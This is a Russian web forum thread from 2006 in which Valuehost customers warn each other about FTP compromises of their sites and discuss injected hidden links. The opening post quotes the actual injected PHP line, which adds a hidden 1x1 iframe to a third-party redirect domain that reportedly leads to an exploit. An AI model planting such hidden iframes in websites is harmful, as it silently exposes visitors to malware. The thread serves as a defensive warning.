Важно! Владельцам сайтов на Валюе

Редько Владимир
На сайте с 02.11.2004
Offline
75
6090

По причине того, что Валюе как обычно "забыло" предупредить своих клиентов, то ...

Предупреждаю!

17.10.2006 на моем сайте в файле index.php были внесены изменения:

print "</body><iframe src="http://ltraffic.biz/resource.php?id=158&user=xpass" width=1 height=1></iframe></html>\n";

нашел, что такое же было зафиксировано 16.10.2006

http://www.master-x.com/forum/topics/72001/

Подобный взлом по фтп случался у Валюе неоднократно, но раньше изменения вносились только в хтмл страницы. Мой случай показывает, что теперь пытаются вносить внешние изменения в системы управления сайтом.

Ну, соответственно, проверьте Ваши сайты и CMS на предмет измененных 16-17 октября файлов.

bondarev.pp.ru
На сайте с 29.09.2005
Offline
202
#1

Это единичный случай, или такое наблюдается на множестве аккаунтов?

bondarevpipes.com (http://ru.bondarevpipes.com/)
Редько Владимир
На сайте с 02.11.2004
Offline
75
#2

Хочу сразу добавить, что моя тема не является моим личным отношением к Валюе. В настоящий момент я на такую тему не созрел. И не думаю, что в этой теме стоит обсуждать позитив/негатив к этому хостеру.

Возникла проблема с несанкционированным доступом по фтп. Хостер сказал, что о проблеме уже известно, дырка закрыта, виновных ищут.

Поиск показал, что я не единственный такой. Поэтому вынес эту новость для всех, чтобы владельцы сайтов проверили наличие указанного кода и вообще ВДРУГ измененные сайты в примерно указанные сроки.

Сколько было подобных случаев - не знаю.

A
На сайте с 06.12.2004
Offline
15
#3

Хотел бы добавить!

Я являюсь владельцем проектов ltds.biz и ltraffic.biz

И заявляю что ltraffic.biz который упоминается в ссылке вставленной в ифрейм никакого отношения ко взлому не имеет! Мы всего лишь предоставляем услугу редиректа, ссылки ведут на эксп к которому мы тоже не имеем никакого отношения.

Тем более что система абсолютно бесплатна и мы не получаем никакого процента от траффика!

А валюхост, если бы вел себя корректно, то мог бы попросить нас закрыть этот аккаунт и вопрос был бы исчерпан! Но они решили кинуться на меня с угрозами о физической расправе! И даже не попросили предоставить информацию о взломщике... странные ребята...

Каширин
На сайте с 03.01.2004
Offline
1018
#4

Взлом valuehost происходит неоднократно на протяжении всей истории его существования. Во время последнего хака злоумышленники установили невидимые ссылки на главных страницах, за что сайты улетели в бан в Яндексе.

Нужно иметь завидное мужество и терпение, чтобы продолжать хостить там сайты.

WebCode
На сайте с 03.06.2005
Offline
86
#5

Наблюдал такое же на нескольких сайтах, своих и не только. Имея root доступ к серверам, подобные штуки убирал. Да, это не на всех сайтах сервера было.

Было это несколько месяцев назад, поэтому не могу утверждать, что в iframe был указан ltraffic.biz.

А кто-нибудь знает, каким образом это происходит? Что взламывают?

K
На сайте с 31.01.2001
Offline
737
#6
Каширин:
Нужно иметь завидное мужество и терпение, чтобы продолжать хостить там сайты

Или просто патологическую лень и разгильдяйство, чтобы не переносить сайты на другой хостинг :).

Выделенные полосы в Москве (http://www.probkovorot.info) привели к снижению скорости до 23%.
Yaroslav_Adv
На сайте с 27.09.2005
Offline
199
#7
Каширин:
Нужно иметь завидное мужество и терпение, чтобы продолжать хостить там сайты.

Это точно...

С уважением, Ярослав Деревягин Веб-агентство "Found (http://found-it.ru)"
Paco
На сайте с 14.04.2005
Offline
27
#8

Сегодня утром на 2х своих проектах обнаружил такой же взлом.

на ltraffic.biz внедрили в index.html

а на другом ресурсе в index.php (в самом конце файла) вставили около сотни линков на разные сайты.

Но вот не додумался обратить внимание какого числа были произведены изменения.

Такой хак на своих ресурсах (расположенных на валуе) я наблюдаю уже во второй раз. 😕

Редько Владимир
На сайте с 02.11.2004
Offline
75
#9

Раз пошла такая пьянка ...

Только на своих проектах наблюдаю третий раз за текущий год. :)

1. нашел левый файл состоящий из одной ссылки на чужой ресурс (стоит цмс)

2. нашел левый почтовый ящик (можно создать только в админке)

3. указанное в теме.

sergant001
На сайте с 26.07.2006
Offline
26
#10

26.11 опять история повторяется с одним из проектов (и хостинг, и ссылка те же)

"на другом ресурсе в index.php (в самом конце файла) вставили около сотни линков на разные сайты"

с этим же проектом такое случилось в конце мая, линки были на забугорные сайты...

Создание сайтов СПб (http://lenik.spb.ru), продвижение сайтов Санкт Петербург (http://promo-lenik.com)

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий